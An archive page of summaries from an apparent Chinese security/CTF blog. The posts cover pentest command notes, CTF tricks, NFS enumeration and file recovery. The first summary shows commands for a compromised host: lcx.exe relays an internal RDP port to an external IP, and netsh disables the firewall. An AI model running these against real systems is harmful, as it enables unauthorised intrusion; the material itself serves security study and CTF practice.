11 2016 档案

渗透常用命令笔记
摘要:1.内网渗透端口转发: 在被控制机上执行: lcx.exe -slave 216.32.*.*(一个外网ip) 51 192.168.2.32(内网ip) 端口号 netsh firewall set opmode disable 开启3389后关闭防火墙 在本机上执行: lcx.exe liste 阅读全文
posted @ 2016-11-30 14:00 tr1ple 阅读(376) 评论(0) 推荐(0)
Misc套路记录
摘要:1.对于给定的二维码图片不能直接扫描出来的可以进行反色在进行扫描,反色可以直接选中图片然后就会进行反色。2.局域网中抓取的数据包的加密方式可能是aes加密。3.凯撒加密可能是变种的凯撒加密,可能奇数偶数位的移位数不同。 4.zip伪加密 直接用16进制编辑器查看,查找50 4B 01 02 然后观察 阅读全文
posted @ 2016-11-26 21:08 tr1ple 阅读(482) 评论(0) 推荐(0)
web小trick
摘要:1.当php后缀被过滤的时候可以直接对ph开头的后缀进行一个fuzz测试可以上传的文件后缀名2.curl -x 123.45.67.89:1080 -o page.html http://www.linuxidc.com指定http访问所使用的proxy服务器及其端口 3.CTF php://inp 阅读全文
posted @ 2016-11-26 21:06 tr1ple 阅读(662) 评论(0) 推荐(1)
常见漏洞
摘要:NFS漏洞:(Network File System 即网络文件系统NFS 默认工作在2049端口) 目录列举: 方法1: nmap -script=nfs-ls.nse 127.0.0.1 方法2. 挂载到本地 mount -t nfs 192.168.0.1:/export/home /tmp/ 阅读全文
posted @ 2016-11-26 20:27 tr1ple 阅读(487) 评论(0) 推荐(0)
foremost
摘要:foremost 恢复单个类型文件 删除一个 USB(/dev/sdba1)存储器中一个 png 文件然后使用 formost 恢复。 恢复完成后会在当前目录建立一个 output 目录,在 output 目录下会建立 png 子目录下会包括所有可以恢复的 png 格式的文件。 需要说明的是 png 阅读全文
posted @ 2016-11-15 23:44 tr1ple 阅读(477) 评论(0) 推荐(0)
积累一点ctf需要掌握的常见脚本知识
摘要:1.利用像素点还原图片。 2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。 3.利用py将base64编码的字符串还原成图片 4.生成0e哈希值: 5.mongodb基于正则注入: 6.多次压缩打包 7.多次解压: 阅读全文
posted @ 2016-11-15 21:29 tr1ple 阅读(3842) 评论(0) 推荐(0)